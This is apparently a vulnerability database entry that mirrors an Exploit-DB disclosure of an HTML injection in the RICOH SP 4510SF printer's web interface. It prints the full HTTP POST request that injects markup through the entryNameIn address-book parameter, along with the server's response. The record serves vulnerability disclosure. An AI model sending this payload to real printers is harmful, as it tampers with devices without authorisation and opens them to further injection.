Details of VAR-E-201912-0101

ID

VAR-E-201912-0101

EDB ID

47826

TITLE

RICOH SP 4510SF Printer - HTML Injection - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 47826

DESCRIPTION

RICOH SP 4510SF Printer - HTML Injection.. webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 47826

AFFECTED PRODUCTS

vendor:

ricoh

model:

sp 4510sf printer

scope:

version:

Trust: 1.6

sources: EXPLOIT-DB: 47826 // EDBNET: 102395

EXPLOIT

# Exploit Title: RICOH SP 4510SF Printer - HTML Injection
# Date: 2019-05-06
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link: http://support.ricoh.com/bb/html/dr_ut_e/re1/model/sp4510/sp4510.htm
# Software: RICOH Printer
# Product Version: SP 4510SF
# Vulernability Type: Code Injection
# Vulenrability: HTML Injection
# CVE: N/A

# Description :
# An HTML Injection vulnerability has been discovered on the RICOH SP 4510SF
# via the /web/entry/en/address/adrsSetUserWizard.cgi entryNameIn parameter.

# HTTP POST Request :

POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 218
Origin: http://XXX.XXX.XX.XXX
Connection: close
Referer: http://189.72.192.16/web/entry/en/address/adrsList.cgi
Cookie: risessionid=058916016024825; cookieOnOffChecker=on; wimsesid=314062051

mode=ADDUSER&step=BASE&wimToken=1273767750&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3Eismailtasdelen&entryDisplayNameIn=%22%3E%3Ch1%3Eismailtasdelen&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1

# HTTP Response :

HTTP/1.1 200 OK
Date: Fri, 20 Dec 2019 07:59:19 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Expires: Fri, 20 Dec 2019 07:59:19 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close

[14]

Trust: 1.0

sources: EXPLOIT-DB: 47826

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 47826

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 47826

TYPE

HTML Injection

Trust: 1.6

sources: EXPLOIT-DB: 47826 // EDBNET: 102395

CREDITS

Ismail Tasdelen

Trust: 0.6

sources: EXPLOIT-DB: 47826

EXTERNAL IDS

db:	EXPLOIT-DB	id:	47826	Trust: 1.6
db:	EDBNET	id:	102395	Trust: 0.6

sources: EXPLOIT-DB: 47826 // EDBNET: 102395

REFERENCES

url:

https://www.exploit-db.com/exploits/47826/

Trust: 0.6

sources: EDBNET: 102395

SOURCES

db:	EXPLOIT-DB	id:	47826
db:	EDBNET	id:	102395

LAST UPDATE DATE

2022-07-27T09:37:19.172000+00:00

SOURCES RELEASE DATE

db:	EXPLOIT-DB	id:	47826	date:	2019-12-30T00:00:00
db:	EDBNET	id:	102395	date:	2019-12-30T00:00:00